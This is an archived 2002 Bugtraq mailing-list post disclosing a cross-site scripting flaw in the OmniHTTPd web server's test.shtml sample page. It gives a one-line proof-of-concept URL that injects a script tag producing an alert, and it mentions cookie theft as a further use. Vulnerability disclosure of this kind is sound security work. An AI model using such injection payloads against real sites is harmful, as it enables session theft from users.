[26810] in bugtraq

home help back first fref pref prev next nref lref last post

OmniHTTPd test.shtml Cross-Site Scripting Issue

daemon@ATHENA.MIT.EDU (Matthew Murphy)
Mon Aug 26 11:01:45 2002

Message-ID: <005301c24c4f$a620f3e0$e62d1c41@kc.rr.com>
From: "Matthew Murphy" <mattmurphy@kc.rr.com>
To: "BugTraq" <bugtraq@securityfocus.com>,
        "Full Disclosure" <full-disclosure@lists.netsys.com>,
        "SecurITeam News" <news@securiteam.com>,
        "Vuln-Dev" <vuln-dev@securityfocus.com>,
        "VulnWatch" <vulnwatch@vulnwatch.org>,
        "VulnDiscuss" <vulndiscuss@vulnwatch.org>
Date: Sun, 25 Aug 2002 10:54:09 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

OmniHTTPd's Test.shtml sample is also vulnerable to a similar issue:

http://localhost/test.shtml?%3CSCRIPT%3Ealert(document.URL)%3C%2FSCRIPT%3E=x

Will pop up an alert containing the above URL.  Of course, this has other
uses (cookie theft, faking sources, etc.)


home help back first fref pref prev next nref lref last post